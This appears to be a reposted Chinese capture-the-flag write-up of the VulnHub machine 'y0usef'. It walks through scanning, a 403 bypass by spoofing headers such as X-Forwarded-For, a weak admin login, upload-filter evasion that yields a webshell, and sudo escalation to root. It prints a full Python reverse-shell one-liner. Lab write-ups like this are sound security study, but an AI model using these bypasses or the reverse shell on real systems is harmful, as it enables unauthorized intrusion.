y0usef(vulnhub)

编程入门 行业动态 更新时间:2024-10-28 10:22:54

y0usef(<a href=https://www.elefans.com/category/jswz/34/1763222.html style=vulnhub)"/>

y0usef(vulnhub)

y0usef(vulnhub)

难度不高,学习到的知识很基础
,624/

目录

1.主机发现

arp-scan -l

2.端口扫描

nmap -p 1-65535 -A 192.168.56.107  -A 强力扫描 直接能发现服务
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)80/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.10 (Ubuntu)OS details: Linux 3.2 - 4.9

3.漏洞发现

进入网页,没有什么信息,直接上工具,使用whatweb和dirsearch。

whatweb  http://192.168.56.107Apache[2.4.10], Bootstrap, Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.10 (Ubuntu)], IP[192.168.56.107], JQuery, PHP[5.5.9-1ubuntu4.29], Script, X-Powered-By[PHP/5.5.9-1ubuntu4.29]dirsearch -u IP
301 /adminstration  ->  http://192.168.56.107/adminstration/

访问抓包看看。

403就该放弃了吗?继续尝试!

403Bypass利用方法

1. 旁站绕过的方式:
HOST可以更改,使用域内的主机名,说不定能够绕过2. 通过覆盖URL:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107
--》把这个修改成
GET / HTTP/1.1    这里换成根路径
//X-Original-URL:/adminstration   这里换成要访问的   头部还有
//X-Rewrite-URL:/adminstration    把url重写成要访问的url3.通过请求头的方法:
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107 
--》
GET /adminstration/ HTTP/1.1
Host: 192.168.56.107 
Referer:https://192.168.56.107/adminstration4.以X开头的HTTP头部
X-Originating-IP:127.0.0.1
X-Remote-IP:127.0.0.1
X-forwarded-For:127.0.0.1

尝试尝试
然后你会发现进去了,但是尝试输入账号时,还会403。。所以每次都得加上头部信息。

居然就是弱口令admin,admin。

然后点点页面。还是得加上X-Forwarded-For:127.0.0.1,有个文件上传。

简单说一下绕过的基本方法:

文件扩展名
Content-Type:image/png  jpeg  都尝试下
代码内容中添加GIF89a或者PNG

这里文件上传使用image/png就行了

上传成功去链接:地址就是再上传点URL直接拼接。

打开虚拟终端。查找下存在不存在python环境,可以尝试反弹shell.不反弹也可以,蚁剑上可以正常使用,如果想要反弹shell的话可以使用python代码

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.102",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

那就去看看文件,查看下flag,但是突然觉得这不只是flag,还可能是base64加密的

解密得到信息

ssh : 
user : yousef 
pass : yousef123

4.提权


登录后看看信息:发现了sudo-l可以,还是ALL

直接sudo su或者sudo -s 切换到root身份

更多推荐

y0usef(vulnhub)

本文发布于:2023-06-25 22:09:08,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/885060.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:y0usef   vulnhub

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!